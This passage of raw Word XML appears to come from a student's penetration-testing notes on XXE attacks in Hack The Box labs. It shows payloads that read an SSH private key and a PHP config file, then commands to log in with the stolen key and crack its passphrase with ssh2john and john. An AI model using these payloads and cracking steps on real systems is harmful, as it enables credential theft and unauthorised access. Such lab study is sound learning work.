        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/bugreport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C33">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit XXE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C34">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One thing we can do (as shown in the Markup HTB), is see that some of the source code of the pages is written by someone named daniel and then we see SSH is running on the target machine, so then we can look for their SSH key to log into their account via SSH. They can be found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">c:/users/daniel/.ssh/id_rsa</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, assuming daniel is the username. So we can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C37">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C38">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C39">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY xxe SYSTEM "file:///c:/users/daniel/.ssh/id_rsa"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3B">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3D">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…rest of the XML code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, once you get the SSH key (make sure to include the "-----BEGIN OPENSSH PRIVATE KEY-----" and "-----END OPENSSH PRIVATE KEY-----"), you can then put it in a local file called id_rsa or anything like that, and then change the privileges of that file to readable only from the owner, which is the only format in which you can put private keys that are accepted by SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Subl id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">paste private key into it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember to add a blank trailing line at the end since that's how you format private keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600 id_rsa </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This makes it only readable/writable by owner and NO OTHER privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa daniel@10.129.226.199</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it says you need a passphrase, then crack it using ssh2john</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john id_rsa&gt; hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this doesn't work, take a more elaborate approach to find the mode for cracking hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5099941" cy="4380719"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="298" name="image292.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image292.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId275"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5099941" cy="4380719"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2880" w:right="600" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ignore the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sshng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" at the start since it's just a JohnTheRipper tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 15.2.5. SSH Private Key Passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Might take a couple of minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C53">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to exploit XXE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the BountyHunter HTB, we saw that the website had a db.php file, but when we visited it, nothing showed up. But now that we can read any file, we can try reading this one. We can guess that it's in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/db.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We need this special XXE payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C59">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE data [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/db.php"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;bugreport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;title&gt;test&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;cwe&gt;test&lt;/cwe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C5F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
